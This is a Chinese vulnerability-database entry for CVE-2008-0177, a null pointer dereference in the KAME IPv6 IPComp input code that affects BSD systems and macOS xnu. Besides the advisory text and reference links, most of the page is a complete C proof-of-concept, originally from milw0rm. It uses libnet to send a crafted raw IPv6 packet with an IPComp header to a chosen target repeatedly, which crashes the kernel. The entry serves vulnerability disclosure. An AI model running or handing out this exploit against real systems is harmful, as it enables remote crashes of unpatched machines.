KAME Project IPv6 IPComp头 远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114671 漏洞类型 设计错误
发布时间 2008-02-26 更新时间 2008-07-11
CVE编号 CVE-2008-0177 CNNVD-ID CNNVD-200802-105
漏洞平台 Multiple CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/5191
https://www.securityfocus.com/bid/27642
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-105
|漏洞详情
KAME项目是6家日本公司协作为各种BSD系统所提供的免费IPv6、IPsec和MobileIPv6实现。KAME项目实现的IPv6协议栈存在漏洞,远程攻击者可能利用此漏洞导致服务器不可用。如果BSD系统使用了KAME项目的IPv6,则在处理有IPComp头的IPv6报文时kame/sys/netinet6/ipcomp_input.c文件的ipcomp6_input()函数会出现空指针引用。如果将内核配置为处理IPsec和IPv6通讯的话,单个特制的IPv6报文可能导致拒绝服务攻击(系统崩溃)。
|漏洞EXP
/* xnu-ipv6-ipcomp.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC
 * by mu-b - Sun 24 Feb 2008
 *
 * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386)
 *              Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386)
 *
 * ipcomp6_input does not verify the success of the first call
 * to m_pulldown (m -> md typo?).
 *
 *         md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
 *         if (!m) {
 * ->
 *         md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
 *         if (!md) {
 *                                    (bsd/netinet6/ipcomp_input.c)
 *
 * curiosly the same bug exists in ipcomp4_input, but an explicit
 * check is made to ensure there is enough space for the struct ipcomp.
 *
 * Note: bug independently found by Shoichi Sakane of the KAME project.
 *       (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
 *          (http://www.kb.cert.org/vuls/id/110947)
 *          (http://www.securityfocus.com/bid/27642)
 *          (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <arpa/inet.h>
#include <ifaddrs.h>
#include <libnet.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define IPV6_INTERFACE    "eth0"
#define IPV6_SRC_OFFSET   8
#define IPV6_DST_OFFSET   24

#define HAMMER_NUM        8

static unsigned char pbuf[] = 
  "\x60"
  "\x00\x00\x00"
  "\x00\x00"      /* plen = 0           */
  "\x6c"          /* nxt_hdr = IPComp   */
  "\x66"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

static int
get_localip (char *if_name, unsigned int *ip6_addr)
{
  struct ifaddrs *ifa_head;
  int result;

  result = -1;
  if (getifaddrs (&ifa_head) == 0)
    {
      struct ifaddrs *ifa_cur;

      ifa_cur = ifa_head;
      for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
        {
          if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
            {
              if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 ||
                  ifa_cur->ifa_addr->sa_family != AF_INET6 ||
                  !(ifa_cur->ifa_flags & IFF_UP))
                continue;

              memcpy (ip6_addr,
                      &(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr),
                      sizeof (int) * 4);
              result = 0;
              break;
            }
        }

      freeifaddrs (ifa_head);
    }

  return (result);
}

int
main (int argc, char **argv)
{
  char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
  unsigned int i, ip6_addr[4];
  libnet_t *lnsock;

  printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc < 2)
    {
      fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  if (get_localip (IPV6_INTERFACE,
                   (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
    {
      fprintf (stderr, "* get_localip() failed\n");
      exit (EXIT_FAILURE);
    }

  if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
    {
      fprintf (stderr, "* inet_pton() failed\n");
      exit (EXIT_FAILURE);
    }
  memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);

  lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
  if (lnsock == NULL)
    {
      fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
      exit (EXIT_FAILURE);
    }

  inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
  printf ("* local ipv6 %s...\n", ip6_buf);
  printf ("* attacking %s...", argv[1]);
  for (i = 0; i < HAMMER_NUM; i++)
    libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
  printf ("done\n");

  return (EXIT_SUCCESS);
}

// milw0rm.com [2008-02-26]
|受影响的产品
NetBSD NetBSD 3.0.2 NetBSD NetBSD 3.0.1 NetBSD NetBSD 2.1 NetBSD NetBSD 2.0.3 NetBSD NetBSD 2.0.2 NetBSD NetBSD 2.0.1 NetBSD NetBSD 2.0
|参考资料

来源:US-CERT
名称:VU#110947
链接:http://www.kb.cert.org/vuls/id/110947
来源:US-CERT
名称:TA08-150A
链接:http://www.us-cert.gov/cas/techalerts/TA08-150A.html
来源:BID
名称:27642
链接:http://www.securityfocus.com/bid/27642
来源:SECUNIA
名称:28788;PatchInformation
链接:http://secunia.com/advisories/28788
来源:www.kame.net
链接:http://www.kame.net/dev/cvsweb2.cgi/kame/kame/sys/netinet6/ipcomp_input.c.diff?r1=1.36;r2=1.37
来源:VUPEN
名称:ADV-2008-2094
链接:http://www.frsirt.com/english/advisories/2008/2094/references
来源:SECUNIA
名称:31074
链接:http://secunia.com/advisories/31074
来源:SECUNIA
名称:28816
链接:http://secunia.com/advisories/28816
来源:APPLE
名称:APPLE-SA-2008-07-11
链接:http://lists.apple.com/archives/security-announce/2008//Jul/msg00001.html
来源:cvsweb.netbsd.org
链接:http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?f=u&only_with_tag=netbsd-3-1
来源:MILW0RM
名称:5191
链接:http://www.milw0rm.com/exploits/5191
来源:VUPEN
名称:ADV-2008-1697
链接:http://www.frsirt.com/english/advisories/2008/1697
来源:VUPEN
名称:ADV-2008-0688
链接